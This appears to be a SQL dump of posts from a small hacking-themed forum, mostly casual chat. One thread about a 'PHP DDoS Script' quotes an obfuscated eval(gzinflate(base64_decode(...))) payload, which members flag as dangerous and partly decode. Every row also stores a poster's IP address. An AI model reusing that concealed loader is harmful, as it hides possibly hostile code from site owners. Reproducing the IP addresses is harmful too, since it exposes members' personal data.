following:\r\n\r\n[code]\r\nTimer1.Start()\r\n[/code]\r\n\r\nReturn to the Form. Double click the stop button and enter the following:\r\n\r\n[code]\r\nTimer1.Stop()\r\n[/code]\r\n\r\nReturn to the form. On the bottom of the screen, double click the timer and enter the following code:\r\n\r\n[code]\r\nSendKeys.Send(textBox1.Text)\r\nSendKeys.Send(“{ENTER}”)\r\n[/code]\r\n\r\nNow debug and run! You have a chat spammer!!', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8da230e7eedddccb92f56193b54b0a2d', '0', '0'); INSERT INTO mybb_posts VALUES('4594', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '8', 'spacefish36', '1350202245', '[color=#32CD32][b]What Can You Code:[/b][/color]\nI\'m pretty new to this.\n\n[b][color=#32CD32]Favorite Coding Language:[/color][/b]\nPHP \n\n[color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color]\nYes, I will try to help others.\n\n[color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color]\n2 hours a day.\n\n[b][color=#32CD32]Age:[/color][/b]\n19\n\n[b][color=#32CD32]Proof Of Your Coding Abilities:[/color][/b]\nhttp://l33thacking.net/thread-860.html\nhttp://l33thacking.net/thread-351.html\nhttp://l33thacking.net/thread-508.html', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2c07de8824386fa5700abedaa23cb67e', '0', '0'); INSERT INTO mybb_posts VALUES('4595', '859', '4592', '7', 'RE: Absence for 4 days', '0', '8', 'spacefish36', '1350202289', 'I miss you and your posting mayne. Have a safe journey.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3124d0839a5b13c8aa8da1e3420c8ca3', '0', '0'); INSERT INTO mybb_posts VALUES('4596', '75', '181', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '8', 'spacefish36', '1350202439', 'No problem and does anyone like the layout?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '90eb38e827025cc836408f7119929bf9', '0', '0'); INSERT INTO mybb_posts VALUES('4597', '730', '3677', '72', 'RE: Need for Speed Most Wanted limited edition', '0', '8', 'spacefish36', '1350202492', 'I loved the first one and I pre-ordered the limited edition one today.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a18f44bda0c82707b67d3390e780f990', '0', '0'); INSERT INTO mybb_posts VALUES('4598', '861', '0', '7', 'L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350203089', 'I thought it would be a great idea to create a thread for LH milestones so everyone knows what my plans and expectations are.\n\n[b]Unreached Milestones[/b]\n\n[list]\n[*] [color=#1E90FF]Member of the Big Board Owner group on MyBB Community[/color]\n[*] 1,000 threads.\n[*] 300 members\n[*] 400 members\n[*] 50 active members\n[*] 10,000 posts\n[*] Top 5 rank on forumtopsites.net\n[*] Minimum 10 threads in each forum on LH\n[*] Become a well-known website\n[*] Someone on LH to reach 100 positive rep\n[*] A pro hacker to begin their journey from LH\n[*] A full page of l33thacking backlinks when L33thacking searched on Google\n[/list]\n\n[b]Completed[/b]\n\n[list]\n[*] [color=yellow] 5,000 posts[/color]\n[*] User with at least 20 referrals and at least 2 daily active members\n[*] 4,000 Posts\n[*] 100 Members\n[*] 200 Members\n[*] 100 Threads\n[*] 500 Threads\n[*] 500 Posts\n[*] 1,000 Posts\n[*] 10 active Members\n[/list]', '72.231.24.165', '1223104677', '1', '0', '1', '1350528493', '1', 'f2392d13c62436675905d72061cad348', '0', '1350528493'); INSERT INTO mybb_posts VALUES('4599', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1350205487', 'who are the ten active users \r\njust wondering', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'fe226e51620dd8ae0d09e19b554de191', '0', '0'); INSERT INTO mybb_posts VALUES('4600', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '257', 'XxTREYZxX', '1350205685', 'no im going to win haha lol', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '43fe6e9802d528915d436e079dae23c8', '0', '0'); INSERT INTO mybb_posts VALUES('4601', '859', '4592', '7', 'RE: Absence for 4 days', '0', '257', 'XxTREYZxX', '1350206266', 'have a great holiday and hope your safe \ngoing to miss your great post', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'edbd178c7c9af427397f522a0c46ce93', '0', '0'); INSERT INTO mybb_posts VALUES('4602', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '257', 'XxTREYZxX', '1350206491', 'yeah cod is mine too its just a amazing game. ;)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '914bbf47d14d8999800d871de38fe64e', '0', '0'); INSERT INTO mybb_posts VALUES('4603', '854', '4510', '7', 'RE: Boasting thread', '0', '53', 'sirchamp', '1350207006', 'No Bots No traffic exchange website. Haha\nActually every click came from my computer. You can buy this method. Its worth it.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'bfce7c360655f7997e3094e199a5b3f4', '0', '0'); INSERT INTO mybb_posts VALUES('4604', '859', '4592', '7', 'RE: Absence for 4 days', '0', '62', 'R?????zo?', '1350214499', 'don\'t forget condoms, heard austria girls are hot :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0072027e180f348c50cdea443061bfe0', '0', '0'); INSERT INTO mybb_posts VALUES('4605', '859', '4592', '7', 'RE: Absence for 4 days', '0', '205', 'mothered', '1350216821', 'It\'s good that you\'ve Informed us all.\r\n\r\nHave a great time :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4ddc385738f805bdb689ec3ac8427cb4', '0', '0'); INSERT INTO mybb_posts VALUES('4606', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '205', 'mothered', '1350217171', 'Yes, the position Is better than I expected.\r\n\r\nVoted :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '71c791b6fefd22ff76f8bd19aafc8ce8', '0', '0'); INSERT INTO mybb_posts VALUES('4607', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '205', 'mothered', '1350217324', 'I like heavy metal/hard rock.\r\n\r\nI don\'t mind the occasional rap too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e19c0d0fc9dfe16d6f660192bbe13f1d', '0', '0'); INSERT INTO mybb_posts VALUES('4608', '226', '919', '11', 'RE: A Newbies Guide', '0', '205', 'mothered', '1350217502', 'Great that It\'s stickied.\r\n\r\nA very good reference point Indeed.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f7b9f63576fa1ae4e44a5cf1f9a4fe99', '0', '0'); INSERT INTO mybb_posts VALUES('4609', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350218431', 'I played all of the Artix\'s games and I remember when dragonfable came out, and all the other ones too. DragonFable was my favorite game of em all. Oh and btw nice guy their', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '7843587afe9321bc927f1659d00b6d85', '0', '0'); INSERT INTO mybb_posts VALUES('4610', '862', '0', '71', 'Mount and Blade 2 BannerLord', '0', '254', 'Greed', '1350218785', 'So this game is gonna being coming out in the near by future. I think It going to be a badass game, if it\'s like mount and blade warband.\r\n\r\nokay I was going to post the video for it but I can\'t seem to get the button to work. If you guys haven\'t played any of the mount and blade series, I suggest that you do it pretty damn fun. I suggest mount and blade warband because you can run your own kingdom.', '63.153.255.202', '1067057098', '1', '0', '254', '1350218830', '1', '538258154158273592e7dd4bc9beaa82', '0', '1350218830'); INSERT INTO mybb_posts VALUES('4611', '863', '0', '28', 'Hello other Elite people out there', '0', '254', 'Greed', '1350219712', 'Hey, whats up why isn\'t anyone posting here? it seems really cool here maybe you should post here more often so we can do more stuff. Well bye I guess lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'e1e96fc89c67eebd4f1bf413208e26f3', '0', '0'); INSERT INTO mybb_posts VALUES('4612', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350221422', 'If No ones joins now The People above this Comment have 100% chance to get it next week', '37.74.6.114', '625608306', '1', '0', '0', '0', '1', '7b20e72c95f24812a1ba1afef0c87f00', '0', '0'); INSERT INTO mybb_posts VALUES('4613', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '254', 'Greed', '1350224523', 'lol it wont happen, just telling yeah', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'e1102473f6dc7b908a37815f685e0659', '0', '0'); INSERT INTO mybb_posts VALUES('4614', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350224839', 'Oh sorry add me on Skype then.\n\nSkype: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '570a3eb03acc31cfc7557eae4521a859', '0', '0'); INSERT INTO mybb_posts VALUES('4615', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350224874', 'Lol. Thanks for the rep :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c73e97c662345dbcae79c092f5fa86ae', '0', '0'); INSERT INTO mybb_posts VALUES('4616', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '82', 'iTzIpod', '1350224909', 'Yeah. But it got cheaper after a while. Which I don\'t like :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '768ab3e234e9b24b0463804621334541', '0', '0'); INSERT INTO mybb_posts VALUES('4617', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1350224948', 'Okay. Thank you. =]\n\nHoping he approves it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a951df7b037414949db95d2d460b838f', '0', '0'); INSERT INTO mybb_posts VALUES('4618', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '82', 'iTzIpod', '1350225019', 'Loool.\n\n\nIt\'s actually just a miniature version of HF. Calm yourself...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1173389e3519ab79f4d6fa8758c70d06', '0', '0'); INSERT INTO mybb_posts VALUES('4619', '496', '2408', '14', 'RE: Free Proxy List', '0', '82', 'iTzIpod', '1350225059', 't3h jok3r. Give me you Adf.ly bot. -.-\n\nI need money too you know?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e66d2f0adb54a91731dcfde594a8c560', '0', '0'); INSERT INTO mybb_posts VALUES('4620', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350225150', 'Me, t3h jok3r, Apathy, Pontaholic (I don\'t know your name sorry :/ ) , Flamingworm, NXK, forgot who else..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e927398a9a4b0716a673854bbcc4b205', '0', '0'); INSERT INTO mybb_posts VALUES('4621', '859', '4592', '7', 'RE: Absence for 4 days', '0', '82', 'iTzIpod', '1350225219', 'Shouldn\'t be in the Announcement Section.\nSomeone move it to the Off Topic Section.\n\nHave fun.\nStay safe.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1e22704c6b0253b24fd25c63d39aaa7d', '0', '0'); INSERT INTO mybb_posts VALUES('4622', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350225251', 'Voted on my VPNs. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b81a275e6e92ef4a86489903238350d4', '0', '0'); INSERT INTO mybb_posts VALUES('4623', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1350225316', 'Guya... I won .. -.- Stop posting.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8016606bc141f170837a10e52bb5f854', '0', '0'); INSERT INTO mybb_posts VALUES('4624', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1350225349', 'Hip Hop + Rap is kinda dying.... -.-\n\nUgly music nowadays..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b26ca0366675a3e56eafaacd646e2700', '0', '0'); INSERT INTO mybb_posts VALUES('4625', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350225388', 'Thanks :p\n\nAlthough it sucks :/ Lool It\'s weak.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ede686329eadc5075a566241ec12625f', '0', '0'); INSERT INTO mybb_posts VALUES('4626', '704', '3616', '66', 'RE: Minecraft Accounts', '0', '254', 'Greed', '1350226523', 'Hey I would like one, so ima just pm you in a sec lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '8d0dbf2091e92c13a6c88e191d69f6c9', '0', '0'); INSERT INTO mybb_posts VALUES('4627', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350226680', 'hey I\'m like lvl 10 or something lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'a551ba3e11442987939cb62003e3d1c9', '0', '0'); INSERT INTO mybb_posts VALUES('4628', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350228893', 'On AdventureQuest Worlds?? Really? O_o\n\nLol.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d87cd469daf5033d268fef61cd7989f', '0', '0'); INSERT INTO mybb_posts VALUES('4629', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '62', 'R?????zo?', '1350228928', 'That\'s true, they all rap about their ex, current girlfriend, drugs and money.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '46b5d92b1a10449c8a3674f5fb1ac776', '0', '0'); INSERT INTO mybb_posts VALUES('4630', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '62', 'R?????zo?', '1350228970', 'Looks like I won again! :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4a2512cc295a47762e5e3771c40eb058', '0', '0'); INSERT INTO mybb_posts VALUES('4631', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '62', 'R?????zo?', '1350229004', 'Voted, looks like we are doing it well :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e45f55d19858544634381da05abe38a9', '0', '0'); INSERT INTO mybb_posts VALUES('4632', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '62', 'R?????zo?', '1350229076', 'I\'m not on that list :(\nI guess you forgot me :(', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '730aa7b720863deb88742f9bce5dadb3', '0', '0'); INSERT INTO mybb_posts VALUES('4633', '849', '4616', '73', 'RE: when did you buy your ipod', '0', '62', 'R?????zo?', '1350229320', '[quote=\'iTzIpod\' pid=\'4616\' dateline=\'1350224909\']\r\nYeah. But it got cheaper after a while. Which I don\'t like :p\r\n[/quote]\r\n\r\nthat\'s the thing about technology :P\r\ngets cheaper when a new feature is discovered or implemented.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0ac383f4727fe4f4885e1a15f2a0ae10', '0', '0'); INSERT INTO mybb_posts VALUES('4634', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '62', 'R?????zo?', '1350229384', 'I will rep you too even though I already knew most things about this tutorial :P\nThanks anyways.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6c1c413cee8a61df3171d735101ad9d5', '0', '0'); INSERT INTO mybb_posts VALUES('4635', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '62', 'R?????zo?', '1350229509', 'That\'s actually a good idea if you ask me, abit crazy but yeah :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '81baece213c6bda9b5ba9d5315f802bc', '0', '0'); INSERT INTO mybb_posts VALUES('4636', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '62', 'R?????zo?', '1350229900', 'I will join this, seems like nobody else is participating anyways :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '77554cb5b691ccd3cb13f657f53f8b3b', '0', '0'); INSERT INTO mybb_posts VALUES('4637', '819', '4292', '68', 'RE: PHP DDoS Script', '0', '67', 'HoverCatz', '1350230710', 'This looks dangerous: \n\neval(gzinflate(base64_decode(\'jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+V??c2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM??9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1??aTi2mGSmT8L/Lj7mfJwd/8B\')));', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '6fa648576074f233614d6472352c648f', '0', '0'); INSERT INTO mybb_posts VALUES('4638', '859', '4592', '7', 'RE: Absence for 4 days', '0', '61', 'NXK', '1350232579', 'Thread has been moved, And goodluck on your trip!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '15418cf7f6aa07825215de4d396f6cd2', '0', '0'); INSERT INTO mybb_posts VALUES('4639', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350232862', 'yeah, i just started it like a week ago', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '5e5c320a879cfff6ab0d58a74c97d4c1', '0', '0'); INSERT INTO mybb_posts VALUES('4640', '864', '0', '79', 'Need some coder to check this code', '0', '1', 't3h jok3r', '1350233613', 'http://l33thacking.net/thread-819.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b5e65d3cab4d1803678c1297077de227', '0', '0'); INSERT INTO mybb_posts VALUES('4641', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1350234044', 'You should be a mod now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cac27630689d918d3e234ddf40d53a5d', '0', '0'); INSERT INTO mybb_posts VALUES('4642', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1350235392', 'I am.\n\nThanks @Reloadzor. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c70962d0ad17afe12f1f480db18b9f25', '0', '0'); INSERT INTO mybb_posts VALUES('4643', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1350235444', 'Yeah. Sometimes, I get annoyed of Rap.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1a05e66b4593dadfe1c7a8abab28e95d', '0', '0'); INSERT INTO mybb_posts VALUES('4644', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1350235465', 'Replying to win :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4761319c0e7a20fc1d782b7786fba761', '0', '0'); INSERT INTO mybb_posts VALUES('4645', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350235512', 'Good job guys! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9904238ba54c0a07349b7ff8fa80d982', '0', '0'); INSERT INTO mybb_posts VALUES('4646', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350235540', 'Sorry :p\nWas busy when I made that post..\nToo bad it isn\'t Summer anymore :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a30aa40873489939289207cdb71b4a36', '0', '0'); INSERT INTO mybb_posts VALUES('4647', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '82', 'iTzIpod', '1350235566', 'Yeah. But it\'s business too. :/ Can\'t mess with it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f38b061c598509bcb373ffbf1a8cc340', '0', '0'); INSERT INTO mybb_posts VALUES('4648', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350235592', 'Alright. Thanks :p\n\nDid you read my Rep Comment? :p The one that I gave you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4913d9460a090286c1d783f1e7784fba', '0', '0'); INSERT INTO mybb_posts VALUES('4649', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350235692', 'Greed is a trusted user :D Thanks', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e51b08714675dc99c39cd80fe6603784', '0', '0'); INSERT INTO mybb_posts VALUES('4650', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1350236214', 'Welcome back mate :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6e756f32ec1f0915bd19a645b59417ba', '0', '0'); INSERT INTO mybb_posts VALUES('4651', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '62', 'R?????zo?', '1350236810', 'Of course I saw it :)\nthanks.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '785d98bc002f98c2682d4c4b73a3ea17', '0', '0'); INSERT INTO mybb_posts VALUES('4652', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350239678', 'No problem.\nIt\'s true though :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9b56d46965ac702d1a41a5ba77bccdb', '0', '0'); INSERT INTO mybb_posts VALUES('4653', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1350239703', 'Thank you.', '24.212.197.164', '416597412', '1', '0', '82', '1352550948', '1', '3002243aec9cbd18dbfe19f1cc7f83d7', '0', '1352550948'); INSERT INTO mybb_posts VALUES('7371', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1352550976', 'Umm I can\'t access Unique\'s Member\'s list in the User CP thing. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e3a39b35a4c140abadbbf3b3af3eb3c6', '0', '0'); INSERT INTO mybb_posts VALUES('4654', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '254', 'Greed', '1350245117', 'lol there stupid for even trying this, if every single information get leaked you know what would happen? Mass chaos', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '07586a7b4c2e442879f760ce2dddef4b', '0', '0'); INSERT INTO mybb_posts VALUES('4655', '819', '4637', '68', 'RE: PHP DDoS Script', '0', '61', 'NXK', '1350249820', '[quote=\'HoverCatz\' pid=\'4637\' dateline=\'1350230710\']\nThis looks dangerous: \n\neval(gzinflate(base64_decode(\'jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+V??c2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM??9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1??aTi2mGSmT8L/Lj7mfJwd/8B\')));\n[/quote]\n\nI try\'d to find out what that ran, Since it\'s decoding a string, so\neval(gzinflate(base64_decode) Is decoding this encrypted string\n\"\'jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+V??c2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM??9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1??aTi2mGSmT8L/Lj7mfJwd/8B\')));\"\nwhich comes out as\n[spoiler]J2pWUHZhNXhBRVAxK2NQL0RzQWgzUWxOYjZJZlFxRjhTMHhhU1hyanpBc1VjNHJsN3ZRVjFsM1VzVFVMKzkrNHZnL1JTcU1pNnV1L05tNWszTXFXRUtoV1RRaUh2Zmk0L2hCZnpXVUJGclNDQm9OeGs2L3RzWFpDcjFlWDJOdnVlbCt2VktpYzdqZUVIV0FibGx5d3ZGb05zRmp0SUVsaUlpaTVDZUo3UFdIMFVFTWZ4MS96MlpqNkxaV3FYYTk0dzJNcEd3K0pvbjhhUi9lNVdyUFlOTTV1RFVDMndyc1pIeVJMU0RnMXlXU21NelBjeldtRkZBRnFHUjBFVGNyZmE1TVNRZUNjSEJFYzVja3BaUjZDcld2MVcxUVIrVuKAi+KAi2MyZ3Q0TlZ0bmhVZHFXcGx1c1FldjZrenorUzlJY1lGTmcwUDBNY21iTlVQelhPb1YrVkhPSFQrYWh5MEJUaTllMCtIVm1SbC9xSG9Pc0dYSEgxMzRxK0dtdFNOQ1lnS3p5T0NTRDdqU2RkNllkOXkvR1Z2Zlc5OEZJQnNvN09aOFl1N3kzdmU0YmFZZFBpd29YZmhhRzJObkJ0TkZYYUVaa0MzZ2ZsOWJlYmJGTzRKdXdLWXJLYnpNc1VuQ1NFaE3igIvigIs5L2gzdWIvK0lDMUVJK0xrOHcyTXJTNGQ3QkpGeG9KeEgwWmFlUldGdmRNYU9BUWpkOGduN295TVVVZlFZYjNYR05JWEJhbFRGRFZ3dkVzVjZBTlQwYjHigIvigIthVGkybUdTbVQ4TC9MajdtZkp3ZC84QicpKSk7[/spoiler]\n\nSo I think it\'s just some code to keep it fud from the host you have it on so they don\'t investigate the files but I don\'t know i\'m a noob with php n\' all that stuff.', '99.253.94.204', '1677549260', '1', '0', '61', '1350249886', '1', '4054ed382fd3fb7d55f635ee54d9efd1', '0', '1350249886'); INSERT INTO mybb_posts VALUES('4656', '864', '4640', '79', 'RE: Need some coder to check this code', '0', '61', 'NXK', '1350249939', 'http://l33thacking.net/thread-819-post-4655.html#pid4655\nIf I am right.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '80d07caf9c2a47fedce06abfb4a38db0', '0', '0'); INSERT INTO mybb_posts VALUES('4657', '862', '4610', '71', 'RE: Mount and Blade 2 BannerLord', '0', '262', 'RAND0M1ZER', '1350250323', 'I got Mount and Blade warband during the Steam summer sale for a few bucks and I must say its quite a unique game. Up until then I had never played a game that featured musket warfare.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '2b8d88595ddefce6b32a4c3d43a24b63', '0', '0'); INSERT INTO mybb_posts VALUES('4658', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '262', 'RAND0M1ZER', '1350250508', 'I bought an iPod video 5G in August of 2006, and I have been using it ever since. Unfortunately it got stolen from the gym locker about a year and half ago.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'ecfac4f4cda78b5d2390d488f30e8c1f', '0', '0'); INSERT INTO mybb_posts VALUES('4659', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '262', 'RAND0M1ZER', '1350250589', 'The current one looks pretty good, or is this for another site?', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'f90c60769ed9e5d0aff18154bb92a7f0', '0', '0'); INSERT INTO mybb_posts VALUES('4660', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '82', 'iTzIpod', '1350252145', 'That sucks.\nAnd that\'s why I bring nothing to the gym. It can drop & break or get stolen/confiscated... Etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6c5a8f6971d5bea2081c593670f4be7a', '0', '0'); INSERT INTO mybb_posts VALUES('4661', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350252174', 'Can you give me some details on the logo?\nI can make it for you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 